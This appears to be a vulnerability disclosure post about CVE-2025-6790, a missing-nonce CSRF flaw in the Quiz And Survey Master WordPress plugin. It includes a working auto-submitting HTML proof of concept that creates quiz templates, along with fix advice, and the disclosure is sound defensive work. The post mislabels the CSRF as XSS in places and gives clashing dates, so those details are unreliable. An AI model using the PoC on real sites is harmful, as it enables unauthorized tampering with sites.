Quiz And Survey Master (QSM) is a powerful WordPress plugin used to design and deploy quizzes, surveys, and assessments, with over 50,000 active installations. Despite its extensive use for educational and marketing purposes, a critical vulnerability—CVE-2025-6790—has been identified that permits unauthenticated attackers to perform Cross-Site Request Forgery (CSRF) against its AJAX endpoint for quiz template creation. This flaw allows an attacker to inject arbitrary templates into the system, potentially enabling further administrative actions or content hijacking without requiring any valid credentials.
| CVE | CVE-2025-6790 |
| Plugin Version | QSM < 10.2.3 |
| Critical | High |
| All Time | 2 883 377 |
| Active installations | 50 000+ |
| Publicly Published | May 30, 2025 |
| Last Updated | May 30, 2025 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6790 https://wpscan.com/vulnerability/af337f9f-c955-49eb-9675-2f85da96fcfe/ |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| June 27, 2025 | Plugin testing and vulnerability detection in the Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker have been completed |
| June 27, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| July 21, 2025 | Registered CVE-2025-6790 |
Discovery of the Vulnerability
During a security assessment focused on QSM’s AJAX actions, researchers discovered that the qsm_insert_quiz_template action is exposed via admin-ajax.php without any nonce checks or capability verification. This endpoint accepts POST requests to insert or update quiz templates, trusting any incoming parameters. Because there is no CSRF protection—no nonce, no user capability validation—an attacker can craft a malicious HTML page that auto-submits a form to this endpoint, creating new templates silently under the guise of legitimate plugin use.
Understanding of XSS attack’s
Cross-Site Request Forgery (CSRF) takes advantage of the trust a site places in a user’s browser. In WordPress, secure AJAX endpoints require nonces or capability checks to ensure the request originates from an authenticated session. Past high-profile CSRF exploits in plugins such as Ultimate Member and WooCommerce have shown that missing nonce validation can lead to unauthorized changes—from user role escalations to settings tampering. In the case of QSM, CSRF allows an unauthenticated attacker not only to create rogue quiz templates but potentially to chain this to further actions, such as sending malicious quiz links to admins or injecting content that triggers additional backdoors.
Exploiting the XSS Vulnerability
To exploit CVE-2025-6790, an attacker without any Cookie:
POC:
<html> <body> <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="qsm_insert_quiz_template" /> <input type="hidden" name="template_name" value="HACKED_PAYLOAD" /> <input type="hidden" name="template_content" value="<h1>HACKED</h1>" /> <input type="hidden" name="template_id" value="" /> <input type="hidden" name="template_type" value="result" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>____
Unauthorized template creation can be leveraged in several harmful ways: an attacker could craft a quiz template that, when previewed by an administrator, contains JavaScript payloads to perform Stored XSS, credential theft, or REST API misuse to create new admin users. In educational or corporate settings, malicious quizzes could deploy ransomware downloads or phishing forms, tricking users into divulging sensitive information. Over time, these unauthorized templates could persist across plugin updates, creating a durable foothold for attackers.
Recommendations for Improved Security
To mitigate this vulnerability, QSM developers must implement strict CSRF protections and capability checks on the qsm_insert_quiz_template endpoint using check_ajax_referer() and current_user_can(). All AJAX actions that perform data-altering operations should require a valid nonce and verify that the requesting user has the necessary permissions (e.g., manage_options). Additionally, site administrators should restrict access to plugin endpoints through WAF rules that block unauthenticated requests to admin-ajax.php for QSM actions. Regular plugin updates and security audits will further minimize the risk of similar exploits.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-6790 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.